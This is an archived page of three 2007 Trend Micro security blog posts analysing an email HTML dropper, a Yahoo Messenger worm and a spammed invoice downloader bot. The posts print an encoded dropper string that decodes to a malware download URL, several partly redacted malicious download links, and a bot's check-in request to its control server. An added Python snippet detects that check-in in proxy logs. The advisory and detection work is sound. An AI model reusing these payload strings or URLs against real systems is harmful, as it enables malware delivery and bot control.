
Archive for September 20th, 2007


Sep20
by Carolyn Guevarra (Technical Communications)

TrendLabs received reports of malicious files being distributed via email to a target audience, particularly a small Chinese Internet community. According to SANS Internet Storm Center, the email message is written in Chinese.


“Clicking on the attachment does not actually do anything; while it contains some dropper code, it appears to have been corrupted, or does not load correctly on our UK English test systems.”

Read more about the article here.

The attached file content.html opens and closes script tags immediately. Within the HTML body, it opens a Microsoft Spreadsheet object. The rest of the file is a Microsoft Word document in XML format. The following string also appears just in front of the Office document:


%u7468%u7074%u2F3A%u372F%u2E30%u3538%u322E%u2E35%u3731%u3A34%u3733%u3132%u312F%u652E%u6578

This translates into http://70.{BLOCKED}.174:3721/1.exe when decoded. Trend Micro detects the said HTML file as JS_AGENT.AAAA.

The executable file 1.exe, which is downloaded into the system as GALAI.EXE, is packed using BeRo. Trend Micro detects this as TROJ_DLOADER.UAM. Once executed, it opens an Internet browser window and plays the following YouTube video:

    http://www.youtube.com/{BLOCKED}?v=3h_kU7-B2vI

This video apparently shows clips related to the Chinese New Year. While this video is playing, it issues a DNS query for thechina.512j.com in the background. This currently resolves to an IP address that is hosted at a certain Chinese internet cafe. From there, it attempts to retrieve a file msss.exe. However, this file is no longer available from the download site.

Although this malware is targeted to a select community, users are warned of the said email and are advised not to click on links within email messages, even if they seem to have come from a trusted source.

Data provided by Maarten Van Horenbeeck of SANS Internet Storm Center. Additional information provided by Trend Senior Threat Researcher Ivan Macalintal.

Posted in Uncategorized

Sep20
by Carolyn Guevarra (Technical Communications)

Today, Senior Anti-Threat Researcher Loucif Kharouni reported a Yahoo Messenger (YM) message that is currently spreading in the wild. It is written in English and contains a link to some pictures of the Iraq war. The link was found to be malicious. Here is a screenshot of what is being received:

[Screenshot: yahoo_spam0.jpg]

Copy-pasting the link into an Internet Explorer browser opens the following Web site:

[Screenshot: virii.JPG]

When the Web site is accessed, the link becomes completely different. This is because once you try to access the picture, it redirects you to a malicious Web site, http://72.{BLOCKED}.170/~plobble/smail/lists/etc/index.php.

[Screenshot: virri2.JPG]

Once this happens, the malicious routine starts. It modifies your YM status into a message containing a malicious link. It also sends out the following messages and malicious links to each of your YM contacts:

[Screenshot: yahoo_spam4.jpg]

Once installed and running on your system, it drops worm files and their components, creates processes, and prevents your system from running antivirus and security programs. Trend Micro detects the dropped files as WORM_SOHANAD.DC and WORM_SOHANAD.DJ. It also drops a copy of itself in the Windows startup folder so that it can run every time Windows restarts. It accesses the following Web sites, probably to download more malicious files:

  • http://72.{BLOCKED}.170/~plobble/smail/lists/etc/worm2007.exe
  • http://72.{BLOCKED}.170/~plobble/smail/lists/etc/YMworm.exe


The network capture of the infection below shows the request to download the file YMworm.exe (WORM_SOHANAD.DC) from the malicious Web site:

[Screenshot: cap2.JPG]

Users are advised to be wary of the said IM messages and not to click on links sent via YM, even if they come from someone you know. Chances are, you might already be downloading WORM_SOHANAD onto your computer.

Data provided by Loucif Kharouni, Senior Anti-Threat Researcher (Trend Micro EMEA)

Posted in Uncategorized

Sep20
by Joey Costoya (Advanced Threats Researcher)

There’s a new malware being spammed right now. It has the attachment invoice.zip, which contains two files:

  • cancel order.exe (md5: 2c51d2f9188464763fc664beedb314ff, size: 3837 bytes)
  • invoice.html

In case the user did not double-click the EXE attachment, there’s a backup plan. The file invoice.html is a short HTML file which attempts to social engineer the user into executing cancel order.exe, by posing as a purchase receipt.

[Screenshot: invoice.png]

The “click here” link will point you to the cancel order.exe executable. But this plan miserably fails if your archiver did not extract the cancel order.exe from the invoice.zip file.

No anti-malware firm detects cancel order.exe yet, with the exception of Trend Micro, which detects the critter as PAK_Generic.001.

The malware downloads the following file:

http://www.[BLOCKED]/webdl4x/webbot.exe

AV coverage is also low, but Trend also detects this one as PAK_Generic.001.

And it seems that our new find is also a bot, as evidenced by this web request.

http://[BLOCKED].info/settings/webbot/remote.php?os=XP&user=sp1-1&status=1&version=0.1&build=beta003&uptime=0w%203d%200h%202m%2052s%20&av=&fw=

As can be seen, it reports the system’s OS, machine name, uptime, AV, and firewall. And the server promptly replies with:

Added Successfully!
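As an added illustration (not code from the original post), the following pulls that check-in request out of constructed Squid-style proxy log lines so the reported fields can be reviewed or alerted on; it matches on the request shape (path and parameter names) rather than the server name, since the host is blocked above and the log lines and host below are placeholders.

```python
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Parameter names the webbot check-in carries in its remote.php query string.
BEACON_FIELDS = {"os", "user", "status", "version", "build", "uptime", "av", "fw"}


def parse_beacon(url: str) -> Optional[Dict[str, str]]:
    """Return the check-in fields if url has the shape of the webbot
    remote.php beacon, else None. Blank values (av=, fw=) are kept because
    their emptiness is itself a signal: no AV or firewall was found."""
    parts = urlsplit(url)
    if not parts.path.endswith("/remote.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if not BEACON_FIELDS.issubset(qs):
        return None
    return {k: qs[k][0] for k in BEACON_FIELDS}


def find_beacons(proxy_log: str) -> List[Dict[str, str]]:
    """Scan Squid native-format lines (client in field 3, URL in field 7)
    and report every webbot check-in together with the client address."""
    hits = []
    for line in proxy_log.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        beacon = parse_beacon(fields[6])
        if beacon:
            hits.append({"client": fields[2], **beacon})
    return hits


# Constructed sample lines; c2.example.invalid is a placeholder, not the real server.
SAMPLE_LOG = """\
1190290000.123 45 10.0.0.5 TCP_MISS/200 512 GET http://www.example.com/index.html - DIRECT/192.0.2.1 text/html
1190290001.456 30 10.0.0.7 TCP_MISS/200 21 GET http://c2.example.invalid/settings/webbot/remote.php?os=XP&user=sp1-1&status=1&version=0.1&build=beta003&uptime=0w%203d%200h%202m%2052s%20&av=&fw= - DIRECT/192.0.2.2 text/html
1190290002.789 12 10.0.0.9 TCP_MISS/200 33 GET http://www.example.com/remote.php?id=1 - DIRECT/192.0.2.1 text/html
"""

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```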

More updates later…

Cheers to Trend Researcher Joey Costoya for discovering this!

Posted in Security


© Copyright 2008 Trend Micro Inc. All rights reserved.